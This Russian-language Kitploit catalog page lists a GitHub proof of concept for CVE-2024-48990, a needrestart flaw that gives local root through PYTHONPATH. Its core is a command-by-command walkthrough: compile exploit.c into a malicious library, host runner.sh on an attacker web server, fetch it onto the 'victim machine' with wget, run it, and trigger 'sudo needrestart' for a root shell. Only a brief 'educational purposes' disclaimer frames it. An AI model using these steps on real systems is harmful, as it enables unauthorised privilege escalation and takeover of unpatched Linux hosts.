Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-48990 — PoC о CVE-2024-48990. Qualys обнаружила, что needrestart до версии 3.8 позволяет локальным злоумышленникам выполнять произвольный код от имени root, обманом заставляя needrestart запускать интерпретатор Python с контролируемой злоумышленником переменной окружения PYTHONPATH. (NIST) | Kitploit
Инструменты/GitHubGitHub/grecosamuel/cve-2024-48990
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и Образование
GitHubgrecosamuel/cve-2024-48990

CVE-2024-48990

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

PoC о CVE-2024-48990. Qualys обнаружила, что needrestart до версии 3.8 позволяет локальным злоумышленникам выполнять произвольный код от имени root, обманом заставляя needrestart запускать интерпретатор Python с контролируемой злоумышленником переменной окружения PYTHONPATH. (NIST)

Поделиться
19 месяцев назадЕщё не проверено

CVE-2024-48990

[!WARNING] Эти файлы и информация предназначены только для образовательных целей. Автор не несет ответственности за любые злонамеренные действия. Вся предоставленная информация не предназначена для подстрекательства к каким-либо преступлениям или злоупотреблениям.

Описание

Qualys обнаружила, что needrestart версии ниже 3.8 позволяет локальным злоумышленникам выполнять произвольный код с правами root, обманом заставляя needrestart запускать интерпретатор Python с контролируемой злоумышленником переменной окружения PYTHONPATH. Официальные подробности смотрите на NIST.

PoC

  1. Загрузите репозиторий из git

git clone https://github.com/grecosamuel/CVE-2024-48990.git

  1. Скомпилируйте библиотеку exploit.c, чтобы сгенерировать корректную ELF-библиотеку, и назовите её __init__.so

gcc -shared -fPIC -o __init__.so exploit.c

  1. Измените <IP> и <PORT> в файле runner.sh, строки 7 и 10, на IP и PORT вашего веб-сервера.
  2. Запустите веб-сервер

python3 -m http.server

  1. Загрузите runner на машину жертвы

wget http://IP:PORT/runner.sh

  1. Установите права на выполнение для runner

chmod +x runner.sh

  1. Запустите скрипт

./runner.sh

  1. Запустите needrestart с правами sudo

sudo needrestart

Когда увидите [*] CVE module created, нажмите CTRL+C, чтобы остановить процесс и получить свою оболочку!

Скачать инструмент